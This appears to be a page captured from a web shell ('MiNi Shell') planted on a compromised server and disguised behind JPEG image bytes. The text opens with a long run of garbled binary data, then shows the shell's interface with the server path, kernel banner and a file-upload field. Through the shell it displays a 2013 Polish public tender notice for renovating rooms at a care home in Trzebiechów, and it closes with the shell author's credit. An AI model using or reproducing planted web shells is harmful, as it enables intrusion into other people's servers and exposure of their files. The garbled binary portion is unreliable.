JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130513/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130513/74343-N-2013.html

<p class="kh_header"><b>Trzebiechów: Modernizację kompleksu pomieszczeń terapii zajęciowej i relaksacji zdrowotnej w Domu Pomocy Społecznej w Trzebiechowie</b><br>
<b>Numer ogłoszenia: 74343 - 2013; data zamieszczenia: 13.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Sulechowska 1, 66-132 Trzebiechów, woj. lubuskie, tel. 068 3514126, faks 068 3514126, 3514136, 3514111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.trzebiechow.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizację kompleksu pomieszczeń terapii zajęciowej i relaksacji zdrowotnej w Domu Pomocy Społecznej w Trzebiechowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia:
CPV: 45453000-7 - roboty remontowe i renowacyjne.
           45450000-6  - roboty budowlane wykończeniowe pozostałe.
1.1. Roboty budowlane polegające na remoncie następujących pomieszczeń piwnicznych znajdujących się w budynku głównym Domu Pomocy Społecznej znajdującym się przy ul. Sulechowskiej 1 ; 66-132 Trzebiechów :
Korytarz pom. 0/1- pow. 79,70 m2 
Palarnia pom. 0/2- pow.16,10 m2 
Terapia zajęciowa  fryzjer  pom. 0/3- pow. 20,90 m2
Terapia zajęciowa pom 0/4- pow. 33,30,00 m2
Terapia zajęciowa pom. 0/5- pow.  45,00 m2
Aneks kuchenny pom. 0/6 - pow. 22,40 m2
Pokój relaksacji pom. 0/7 - pow. 20,30 m2
Magazyn terapeutów pom. 0/8- pow. 20,90 m2
Gabinet psychologa pom 0/9- pow. 15,50 m2
Opis przedmiotu zamówienia zawiera dokumentacja Techniczna Wykonania i Odbioru Robót (załącznik nr 3). W związku z tym , że część prac określonych w dokumentacji projektowej jest wykonana, poniżej opisujemy pozostałe prace do wykonania robót budowlanych :
1.2. Ściany:
-wykonanie nowych tynków wapienno-cementowych,
-	wykonanie powłok malarskich farbami dyspersyjno-przemianowymi,
-	ogólna pow. ścian - 730,90 m2
1.3. Sufity:
-	wykonanie z płyt gipsowych na stelażach stalowych,
-	szpachlowanie połączeń gipsowych
-	wzmocnienie ubytków w suficie prętem stalowym O 12 mm i warstwą betonu B20 gr. 5 cm w ilości ok. 9m2
-	wykonanie powłok malarskich farbami mineralnymi,
1.4. Posadzki:
- wykonanie nowej podbudowy betonowej,
- wykonanie izolacji p.wilgociowej,
- wykonanie izolacji termicznej,
- wykonanie posadzek betonowych,
- wykonanie okładzin z płytek gress -pom. palarni i korytarz w pozostałych pomieszczeniach  wykładzin PCV
1.5. Ślusarka:
- zamontować balustradę stalową przy stopniu wejścia bocznego,
- pomalować balustradę kolorem czarnym,
1.6. Wejście boczne:
- odrestaurować istniejące murki oporowe schodów zejściowych,
- wyremontować i przebudować istniejące schody wejściowe,
- wykonać studzienkę chłonną,
- zamontować wycieraczkę stalową,
1.7. Podłoża i posadzki.
Zagęścić istniejącą podsypkę piaskowa, wykonać podbudowę betonową gr.8 cm,  izolacje p.wilgociową, następnie ułożyć izolację termiczną 10cm dalej wykonać podłoże betonowe, podposadzkowe gr.6 cm, zbrojone siatką antyrysową z prętów O3mm o oczku 10x10cm.
Posadzki - wg zestawienia na rysunkach - zaprojektowano z płytek gress wg karty kolorów oraz z wykładzin podłogowych PCV wg karty kolorów.
Założenia ogólne - wszystkie posadzki wykonać bez progów, na jednym poziomie, połączenia posadzek o różnych materiałach wykonać za pomocą aluminiowych listew progowych. Wszystkie posadzki zakończyć odpowiednio cokolikiem z płytek gress w wysokości 15 cm. W pomieszczeniach w których zamontowana zostanie wykładzina, cokolik wykonać z wywiniętej wykładziny PCV.
1.8. Tynki.
Zaprojektowano tynki ścian i sufitów o powierzchni gładkiej, strukturze tynkowanej, przy użyciu tynków cementowo wapiennych i zapraw szpachlowych. Wszystkie roboty wykonać przy zachowaniu architektonicznych substancji zabytkowych. 
- wykonanać tynki renowacyjne cementowo wapienne, wykonać gładzie z systemowych zapraw szpachlowych 
- malować farbami mineralnymi, akrylowymi.
1.9. Glazura.
W pomieszczeniu oznaczone w projekcie budowlanym pom. nr 0/6 - Aneks kuchenny ułożyć płytki ceramiczne w pasie międzymeblowym o szerokości 75cm, na całej długości szafek - ok.6,6 m2
1.10. Powłoki malarskie.
Ściany - wykonać powłoki malarskie farbami mineralnymi, akrylowymi w kolorach pastelowych, jasnych.
Sufity - wykonać powłoki malarskie farbami mineralnymi, akrylowymi w kolorze białym.
1.11. Izolacja.
Izolacja przeciwwilgociowa, podposadzkowa - wykonać z folii PCV gr.0,3mm.
Izolacja termiczna, podposadzkowa - wykonać ze styropianu EPS 100 070 gr. 10cm.
1.12. Ślusarka aluminiowa.
Zaprojektowano ściankę aluminiową z drzwiami, dwuskrzydłową, z profili aluminiowych, profil tzw. zimny, szyba bezpieczna P2, wyposażyć w samozamykacze i zamki antypaniczne.
1.13. Ślusarka stalowa.
Zaprojektowano balustradę stalowa wejścia bocznego, na nowym stopniu betonowym, wykonać z profili stalowych: pochwyt z płaskownika 40x5mm, słupki profil zamknięty 30x30mm, wypełnienie z prętów stalowych kwadratowych 12x12mm. Ślusarkę malować farbami w kolorze istniejących krat.
1.14. Wejście boczne.
Wykonać remont murków oporowych wejścia bocznego, skuć istniejące tynki i wykonać nowe, następnie ułożyć na nich płyty granitowe gr. 4cm.
Schody wejściowe - rozebrać istniejące, wyprofilować wg opracowania graficznego i ułożyć nowe z cegły klinkierowej, brukowej. Podeście osadzić wycieraczkę stalową, pod wycieraczką wykonać studnie chłonną z rury PCV O300 na głębokość 100cm.
1.15. Elementy inne.
Ściany zabezpieczyć odbojami przed uderzeniem stolarki drzwiowej.
1.16. Ochrona p.poż.
Zgodnie z opinią rzeczoznawcy ds. p.poż. wydzielono wyjście z korytarza do klatki i szybu windy oraz wydzielono część korytarza - zamontować ślusarkę aluminiową, oszkloną, p.poż. o odporności EI30, zgodnie z opracowaniem graficznym.
1.17. Uwagi.
Ze względu na charakter obiektu oraz specyfikę renowacji, określono w projekcie producenta materiałów oraz gamę produktów w porozumieniu z Lubuskim Wojewódzkim Konserwatorem Zabytków, stosowanie innych materiałów wymaga uzgodnienia z Wojewódzkim Urzędem Ochrony Zabytków oraz projektantem.
Remont wykonywać zgodnie z projektem, obowiązującymi normami, zasadami wiedzy technicznej i sztuką budowlaną. Roboty prowadzić pod nadzorem osób uprawnionych, oraz w ścisłej współpracy z  Wojewódzkim Urzędem Ochrony Zabytków w Zielonej Górze.
1.18. Rozwiązania konstrukcyjno - budowlane.
Przemurować ściany zejścia do piwnic, przełożyć schody z bruku klinkierowego.
1.19. Karta kolorów i materiałowa. Zał. nr 8 do SIZW
Elementy stalowe - kolor czarny.
Płytki gress - Opoczno S.A, Hyperion H7, zielony - dopasować do istniejących na korytarzu.
Wykładzina podłogowa PCV - Gamrat Rekord 43. 
Bruk klinkierowy - CRH klinkier, Etna N.
Drzwi wejścia bocznego, element do odtworzenia.
1.20. Szczegółowe wyk robót określa STWiOR  zał. nr 3 do SIWZ
szczegółowa specyfikacja techniczna - roboty tynkowe..
szczegółowa specyfikacja techniczna - posadzki
szczegółowa specyfikacja techniczna - ślusarka
szczegółowa specyfikacja techniczna - roboty malarskie
szczegółowa specyfikacja techniczna - roboty izolacyjne

1.21. Zalecenia zamawiającego:
Zaleca się, aby wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia,
a także zdobył, na swoją odpowiedzialność i ryzyko, wszelkie dodatkowe informacje,
które mogą być konieczne do przygotowania oferty i wykonania zamówienia. Koszty
dokonania wizji lokalnej terenu poniesie wykonawca. 
Wizji lokalnej można dokonać w dniach roboczych zamawiającego od godz. 7:00 - 15:00..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wpłacenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy nie są wykluczeni
z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo
zamówień publicznych oraz którzy spełniają warunki dotyczące:
Posiadania uprawnień do wykonywania określonej działalności lub czynności,
jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia, tj. wykonawca musiał wykonać w okresie
ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwie roboty
budowlane o wartości min. 80 000,00 zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osobami zdolnymi do
wykonania zamówienia, tj. wykonawca musi dysponować min. jedną osobą
należącą do właściwej izby samorządu zawodowego, posiadającą zgodnie
z ustawą z dnia 7 lipca 1994r.- Prawo budowlane (Dz. U. z 2006 r Nr 156, poz.
1118- tekst jednolity z późn. zm.) uprawnienia budowlane do kierowania robotami
budowlanymi w specjalności konstrukcyjno- budowlanej bez ograniczeń,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wymienione w SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwości dokonywania istotnych zmian postanowień zawartej umowy
w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy
wraz z określeniem warunków takich zmian:
a) w przypadku zmiany siedziby wykonawcy lub zamawiającego, zamawiający
dopuszcza w tym zakresie możliwość zmiany zawartej umowy, w formie pisemnego
aneksu pod rygorem nieważności,
b) w przypadku zmiany nazwy oraz formy prawnej stron (np przekształcenie spółki
cywilnej w spółkę jawną), zamawiający dopuszcza w tym zakresie możliwość zmiany zawartej umowy, w formie pisemnego aneksu pod rygorem nieważności,
c) zamawiający na wniosek wybranego wykonawcy może wydłużyć termin
obowiązywania umowy w formie pisemnego aneksu pod rygorem nieważności
w przypadku wykorzystania przez wykonawców środków ochrony prawnej,
powodujących przedłużenie postępowania o udzielenie zamówienia publicznego,
d) w przypadku gdy zaszła konieczność wykonania robót dodatkowych, których
wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji
przedmiotu umowy, zamawiający dopuszcza w tym zakresie możliwość wydłużenia
terminu obowiązywania umowy w formie pisemnego aneksu pod rygorem
nieważności,
e) w przypadku gdy prace objęte umową zostały wstrzymane przez właściwe organy
z przyczyn niezależnych od wykonawcy, co uniemożliwia terminowe zakończenie
realizacji przedmiotu umowy, zamawiający dopuszcza w tym zakresie możliwość
wydłużenia terminu obowiązywania umowy w formie pisemnego aneksu pod rygorem nieważności,
f) w przypadku gdy zaszła konieczność uzyskania niemożliwych do przewidzenia na
etapie planowania inwestycji danych, zgód bądź pozwoleń osób trzecich lub
właściwych organów, co uniemożliwia terminowe zakończenie realizacji przedmiotu
umowy, zamawiający dopuszcza w tym zakresie możliwość wydłużenia terminu
obowiązywania umowy, w formie pisemnego aneksu pod rygorem nieważności,
g) w przypadku gdy wystąpiły złe warunki atmosferyczne uniemożliwiające
prowadzenie robót zgodnie z zasadami sztuki budowlanej lub normami technicznymi,
co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy, zamawiający
zastrzega sobie prawo wydłużenia terminu obowiązywania umowy w formie
pisemnego aneksu pod rygorem nieważności,
h) w przypadku konieczności zmiany kierownika budowy z przyczyn niezależnych od wykonawcy, zamawiający dopuszcza w tym zakresie możliwość zmiany zawartej
umowy w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.trzebiechow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej , ul. Sulechowska 1, 66-132 Trzebiechów
W wersji papierowej 100 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 09:00, miejsce: Dom Pomocy Społecznej , ul. Sulechowska 1, 66-132 Trzebiechów
 W Sekretaricie Domu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com